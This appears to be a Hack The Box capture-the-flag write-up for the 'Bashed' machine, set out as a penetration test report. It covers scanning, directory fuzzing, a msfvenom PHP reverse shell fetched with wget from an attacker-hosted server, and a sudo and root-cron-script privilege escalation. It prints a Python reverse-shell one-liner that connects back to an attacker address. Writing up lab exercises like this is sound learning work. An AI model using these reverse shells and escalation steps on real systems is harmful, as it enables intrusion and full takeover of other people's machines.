# Penetration Test Report - [Bashed]

## Table of Contents
- [1. Reconnaissance](#1-reconnaissance)
- [2. Scanning](#2-scanning)
- [3. Exploitation](#3-exploitation)
- [4. Post-Exploitation](#4-post-exploitation)
- [5. Final Considerations](#5-final-considerations)

![Bashed Banner](screenshots/bashedbanner.png)
## 1. Reconnaissance
In CTF challenges on platforms like Hack The Box, we are provided with prior knowledge of the target machine, its IP address, and sometimes even its name and intended vulnerabilities. This level of information significantly reduces the time of the reconnaissance phase

## 2. Scanning
For active scanning we run a port scan using nmap.

>> $ nmap -sV -sS -p 1-1000 -v bashed
```
Initiating NSE at 00:38
Completed NSE at 00:38, 2.27s elapsed
Initiating NSE at 00:38
Completed NSE at 00:38, 1.82s elapsed
Nmap scan report for bashed (10.10.10.68)
Host is up (1.0s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

```
 So we found a http service, with the Apache version and maybe a Ubuntu OS running on the remote machine. So lets check it.

 ![phpBash](screenshots/serviceshow.png)

 The site show to us that a php shell was developed on the hosted web server application. I tried to access the upload dir like the image show to us, without success.

 Then, we should fuzz it and found the dev directory and bingo, we found some interesting stuff.

 ![dev directory](screenshots/ffufresults.png)

 After that, we found the dev dir and inside it, the phpbash.php script raises a shell inside the remote host.

 ![dev dir on the remote host](screenshots/devdir.png)
 ![php shell on the remote host](screenshots/phpshell.png)

## 3. Exploitation
After this, we created our reverse shell in php, using msfvenom in the command below.

 >> $ msfvenom -p php/reverse\_php LHOST=your\_ip\_address LPORT=your\_port -f raw > shell.php

Using a local http server we download the rev shell file, using wget tool.

 >> $ python -m http.server 80

 >> wget http://\<OUR\_IP\>:80/revshell.php

Then using nc, or something like it we openned some tcp port to establish the connection.

 >> nc -lvnp L\_PORT and we got the user www-data.

## 4. Post-Exploitation

Trying to escal privilige in this machine we check if the user has some privilege command without any password required.

![sudo -l cmd](screenshots/sudolbashed.png)

We realize that any command can be used as scriptmanager user without any password beeing required. So using sudo to change user context we get the scriptmanager user.

![Find File Script](screenshots/findfilesbashed.png)

After search for files wich scriptmanager have access, using find cmd we realize that scripts file have some content inside of it and might be a good idead take a look.

![scripts dir check](screenshots/lslabashed.png)

After check the content of it, we saw that the file scriptmanager was created at 2017 and the output of it minutes ago, with root privileges. So we try to change the file download another instead.

```
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("OUR\_ADDRESS",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

```
Openning a local port with netcat, we wait for some connection from the target machine...

![Root Bashed](screenshots/rootbashed.png)

and we got the root!


## 5. Final Considerations
In the course of our penetration testing on the 'bashed' machine hosted on Hack The Box, we conducted an initial Nmap port scan, which revealed an open HTTP service running Apache httpd 2.4.18 on what appeared to be an Ubuntu OS. Upon accessing the hosted website, we identified a PHP shell and used directo
ry fuzzing to discover the 'dev' directory, housing a 'phpbash.php' script that provided remote shell access. After crafting a PHP reverse shell, we successfully escalated privileges from the 'www-data' user to 'scriptmanager,' leveraging the user's unrestricted command execution capabilities. In the 'scri
pts' directory accessible to 'scriptmanager,' we detected a file executed with root privileges and replaced it with a malicious script, ultimately achieving root access on the target machine

---
